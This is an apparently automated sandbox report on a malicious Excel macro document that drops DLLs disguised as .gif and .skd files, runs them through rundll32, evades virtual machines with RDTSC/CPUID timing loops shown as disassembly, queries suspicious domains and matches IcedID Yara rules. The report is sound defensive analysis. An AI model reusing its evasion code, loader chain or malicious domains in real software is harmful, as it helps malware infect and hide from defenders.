Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd2,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd3,DllRegisterServer	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\ksjvoefv.skd4,DllRegisterServer	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: document-1251000362.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: document-1251000362.xlsm	Initial sample: OLE zip file path = xl/media/image4.png
Source: document-1251000362.xlsm	Initial sample: OLE zip file path = xl/media/image3.png
Source: document-1251000362.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: document-1251000362.xlsm	Initial sample: OLE zip file path = xl/media/image2.png
Source: document-1251000362.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: document-1251000362.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ksjvoefv.skd	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ksjvoefv.skd3	Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ksjvoefv.skd			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ksjvoefv.skd3			Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ksjvoefv.skd	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ksjvoefv.skd3	Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ksjvoefv.skd			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\ksjvoefv.skd3			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_003B1B94		3_2_003B1B94
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_002B1B94		7_2_002B1B94

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\System32\rundll32.exe	RDTSC instruction interceptor: First address: 00000000003B1C52 second address: 00000000003B1C73 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [ebp-10h], eax 0x00000018 mov dword ptr [ebp-0Ch], ebx 0x0000001b mov dword ptr [ebp-08h], ecx 0x0000001e mov dword ptr [ebp-04h], edx 0x00000021 rdtsc
Source: C:\Windows\System32\rundll32.exe	RDTSC instruction interceptor: First address: 00000000003B1C73 second address: 00000000003B1C88 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec ecx 0x0000000a sub eax, eax 0x0000000c dec eax 0x0000000d add edi, eax 0x0000000f call dword ptr [00002428h] 0x00000015 jmp 00007F8410A97298h 0x00000017 jmp dword ptr [000925C2h] 0x0000001d dec eax 0x0000001e sub esp, 28h 0x00000021 dec eax 0x00000022 lea ecx, dword ptr [esp+30h] 0x00000026 call dword ptr [00046D21h] 0x0000002c dec eax 0x0000002d mov dword ptr [esp+08h], ecx 0x00000031 dec eax 0x00000032 sub esp, 18h 0x00000035 dec eax 0x00000036 test ecx, ecx 0x00000038 je 00007F8410AD1F7Dh 0x0000003e dec esp 0x00000040 mov eax, dword ptr [00000030h] 0x00000047 xor eax, eax 0x00000049 dec eax 0x0000004a mov dword ptr [esp+08h], eax 0x0000004e dec ecx 0x0000004f mov edx, dword ptr [eax+000014A0h] 0x00000055 dec eax 0x00000056 mov dword ptr [esp+08h], edx 0x0000005a dec eax 0x0000005b test edx, edx 0x0000005d jne 00007F8410AB078Ch 0x00000063 mov eax, C00000BBh 0x00000068 mov dword ptr [esp], eax 0x0000006b jmp 00007F8410A97292h 0x0000006d jmp 00007F8410A97292h 0x0000006f dec eax 0x00000070 mov dword ptr [ecx], edx 0x00000072 dec eax 0x00000073 add esp, 18h 0x00000076 ret 0x00000077 test eax, eax 0x00000079 jns 00007F8410AB71FFh 0x0000007f call dword ptr [00046D5Bh] 0x00000085 dec esp 0x00000086 mov edx, ecx 0x00000088 mov eax, 00000043h
Source: C:\Windows\System32\rundll32.exe	RDTSC instruction interceptor: First address: 00000000003B1C88 second address: 00000000003B1C95 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
Source: C:\Windows\System32\rundll32.exe	RDTSC instruction interceptor: First address: 00000000003B1C95 second address: 00000000003B1C52 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a sub eax, ecx 0x0000000c dec esp 0x0000000d add esi, eax 0x0000000f dec ecx 0x00000010 sub edi, 01h 0x00000013 jne 00007F8410A97234h 0x00000015 call dword ptr [0000245Eh] 0x0000001b jmp 00007F8410A97298h 0x0000001d jmp dword ptr [000925C2h] 0x00000023 dec eax 0x00000024 sub esp, 28h 0x00000027 dec eax 0x00000028 lea ecx, dword ptr [esp+30h] 0x0000002c call dword ptr [00046D21h] 0x00000032 dec eax 0x00000033 mov dword ptr [esp+08h], ecx 0x00000037 dec eax 0x00000038 sub esp, 18h 0x0000003b dec eax 0x0000003c test ecx, ecx 0x0000003e je 00007F8410AD1F7Dh 0x00000044 dec esp 0x00000046 mov eax, dword ptr [00000030h] 0x0000004d xor eax, eax 0x0000004f dec eax 0x00000050 mov dword ptr [esp+08h], eax 0x00000054 dec ecx 0x00000055 mov edx, dword ptr [eax+000014A0h] 0x0000005b dec eax 0x0000005c mov dword ptr [esp+08h], edx 0x00000060 dec eax 0x00000061 test edx, edx 0x00000063 jne 00007F8410AB078Ch 0x00000069 mov eax, C00000BBh 0x0000006e mov dword ptr [esp], eax 0x00000071 jmp 00007F8410A97292h 0x00000073 jmp 00007F8410A97292h 0x00000075 dec eax 0x00000076 mov dword ptr [ecx], edx 0x00000078 dec eax 0x00000079 add esp, 18h 0x0000007c ret 0x0000007d test eax, eax 0x0000007f jns 00007F8410AB71FFh 0x00000085 call dword ptr [00046D5Bh] 0x0000008b dec esp 0x0000008c mov edx, ecx 0x0000008e mov eax, 00000043h
Source: C:\Windows\System32\rundll32.exe	RDTSC instruction interceptor: First address: 00000000002B1C52 second address: 00000000002B1C73 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [ebp-10h], eax 0x00000018 mov dword ptr [ebp-0Ch], ebx 0x0000001b mov dword ptr [ebp-08h], ecx 0x0000001e mov dword ptr [ebp-04h], edx 0x00000021 rdtsc
Source: C:\Windows\System32\rundll32.exe	RDTSC instruction interceptor: First address: 00000000002B1C73 second address: 00000000002B1C88 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec ecx 0x0000000a sub eax, eax 0x0000000c dec eax 0x0000000d add edi, eax 0x0000000f call dword ptr [00002428h] 0x00000015 jmp 00007F8410A97298h 0x00000017 jmp dword ptr [000925C2h] 0x0000001d dec eax 0x0000001e sub esp, 28h 0x00000021 dec eax 0x00000022 lea ecx, dword ptr [esp+30h] 0x00000026 call dword ptr [00046D21h] 0x0000002c dec eax 0x0000002d mov dword ptr [esp+08h], ecx 0x00000031 dec eax 0x00000032 sub esp, 18h 0x00000035 dec eax 0x00000036 test ecx, ecx 0x00000038 je 00007F8410AD1F7Dh 0x0000003e dec esp 0x00000040 mov eax, dword ptr [00000030h] 0x00000047 xor eax, eax 0x00000049 dec eax 0x0000004a mov dword ptr [esp+08h], eax 0x0000004e dec ecx 0x0000004f mov edx, dword ptr [eax+000014A0h] 0x00000055 dec eax 0x00000056 mov dword ptr [esp+08h], edx 0x0000005a dec eax 0x0000005b test edx, edx 0x0000005d jne 00007F8410AB078Ch 0x00000063 mov eax, C00000BBh 0x00000068 mov dword ptr [esp], eax 0x0000006b jmp 00007F8410A97292h 0x0000006d jmp 00007F8410A97292h 0x0000006f dec eax 0x00000070 mov dword ptr [ecx], edx 0x00000072 dec eax 0x00000073 add esp, 18h 0x00000076 ret 0x00000077 test eax, eax 0x00000079 jns 00007F8410AB71FFh 0x0000007f call dword ptr [00046D5Bh] 0x00000085 dec esp 0x00000086 mov edx, ecx 0x00000088 mov eax, 00000043h
Source: C:\Windows\System32\rundll32.exe	RDTSC instruction interceptor: First address: 00000000002B1C88 second address: 00000000002B1C95 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
Source: C:\Windows\System32\rundll32.exe	RDTSC instruction interceptor: First address: 00000000002B1C95 second address: 00000000002B1C52 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a sub eax, ecx 0x0000000c dec esp 0x0000000d add esi, eax 0x0000000f dec ecx 0x00000010 sub edi, 01h 0x00000013 jne 00007F8410A97234h 0x00000015 call dword ptr [0000245Eh] 0x0000001b jmp 00007F8410A97298h 0x0000001d jmp dword ptr [000925C2h] 0x00000023 dec eax 0x00000024 sub esp, 28h 0x00000027 dec eax 0x00000028 lea ecx, dword ptr [esp+30h] 0x0000002c call dword ptr [00046D21h] 0x00000032 dec eax 0x00000033 mov dword ptr [esp+08h], ecx 0x00000037 dec eax 0x00000038 sub esp, 18h 0x0000003b dec eax 0x0000003c test ecx, ecx 0x0000003e je 00007F8410AD1F7Dh 0x00000044 dec esp 0x00000046 mov eax, dword ptr [00000030h] 0x0000004d xor eax, eax 0x0000004f dec eax 0x00000050 mov dword ptr [esp+08h], eax 0x00000054 dec ecx 0x00000055 mov edx, dword ptr [eax+000014A0h] 0x0000005b dec eax 0x0000005c mov dword ptr [esp+08h], edx 0x00000060 dec eax 0x00000061 test edx, edx 0x00000063 jne 00007F8410AB078Ch 0x00000069 mov eax, C00000BBh 0x0000006e mov dword ptr [esp], eax 0x00000071 jmp 00007F8410A97292h 0x00000073 jmp 00007F8410A97292h 0x00000075 dec eax 0x00000076 mov dword ptr [ecx], edx 0x00000078 dec eax 0x00000079 add esp, 18h 0x0000007c ret 0x0000007d test eax, eax 0x0000007f jns 00007F8410AB71FFh 0x00000085 call dword ptr [00046D5Bh] 0x0000008b dec esp 0x0000008c mov edx, ecx 0x0000008e mov eax, 00000043h

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_003B1B94 rdtsc

3_2_003B1B94

Contains functionality to query network adapater information

Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,		3_2_003B1F94
Source: C:\Windows\System32\rundll32.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,		7_2_002B1F94

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\rundll32.exe

Window / User API: threadDelayed 668

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif			Jump to dropped file

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	Binary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-txt-white lb-h3 lb-title"> VMware Cloud on AWS</h3>
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	Binary or memory string: <a style="padding-left:30px; padding-right:30px;" href="/vmware/?hp=tile&tile=hybridsol" target="_blank" rel="noopener">
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	Binary or memory string: <img src="//d1.awsstatic.com/webteam/homepage/Hybrid%20Solutions/VMWareCloud_Icon.55cb0bcef2c74b55acdb7155e3524e4b5436ec6e.png" alt="VMWareCloud_Icon" title="VMWareCloud_Icon" class="cq-dd-image" />
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	Binary or memory string: Migrate and extend VMware environments to the AWS Cloud
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	Binary or memory string: <a href="/vmware/?hp=tile&so-exp=below"> VMware Cloud on AWS<span>Build a hybrid cloud without custom hardware</span> </a>
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	Binary or memory string: <a style="padding-left:20px; padding-right:45px;" href="/vmware/?hp=tile&tile=hybridsol" target="_blank" rel="noopener">
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	Binary or memory string: <a href="/rds/vmware/?hp=tile&so-exp=below"> Amazon RDS on VMware<span>Automate on-premises database management</span> </a>

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_003B1B94 rdtsc

3_2_003B1B94

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 143.204.3.74 187	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Domain query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	Domain query: aws.amazon.com
Source: C:\Windows\System32\rundll32.exe	Domain query: usaaforced.fun

Source: rundll32.exe, 00000003.00000002.2499893181.0000000000700000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: rundll32.exe, 00000003.00000002.2499893181.0000000000700000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000003.00000002.2499893181.0000000000700000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_003B1D48 LookupAccountNameW,

3_2_003B1D48

Stealing of Sensitive Information:

Yara detected IcedID

Source: Yara match	File source: 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2340656783.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347303586.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353273837.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2346946398.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324539894.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324305529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2313180906.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353071481.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2312959484.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294844286.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347372775.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2307293375.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324432561.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2312752671.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300737619.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359025585.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2288787523.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300503265.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2358776145.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359409712.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353386032.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359132350.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318924371.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2306619325.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2306955212.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300848573.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318582057.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318854529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289125454.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2307060040.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2499534316.00000000000DD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353251472.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2313048515.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318832417.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294985377.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289046679.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324458781.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347597509.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2295056636.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294958860.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289433187.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2341036692.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2301147013.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2340962857.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2864, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2316, type: MEMORY

Remote Access Functionality:

Yara detected IcedID

Source: Yara match	File source: 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2340656783.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347303586.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353273837.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2346946398.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324539894.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324305529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2313180906.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353071481.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2312959484.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294844286.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347372775.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2307293375.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324432561.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2312752671.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300737619.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359025585.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2288787523.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300503265.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2358776145.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359409712.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353386032.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2359132350.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318924371.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2306619325.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2306955212.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2300848573.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318582057.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2318854529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289125454.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2307060040.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2499534316.00000000000DD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2353251472.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2313048515.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
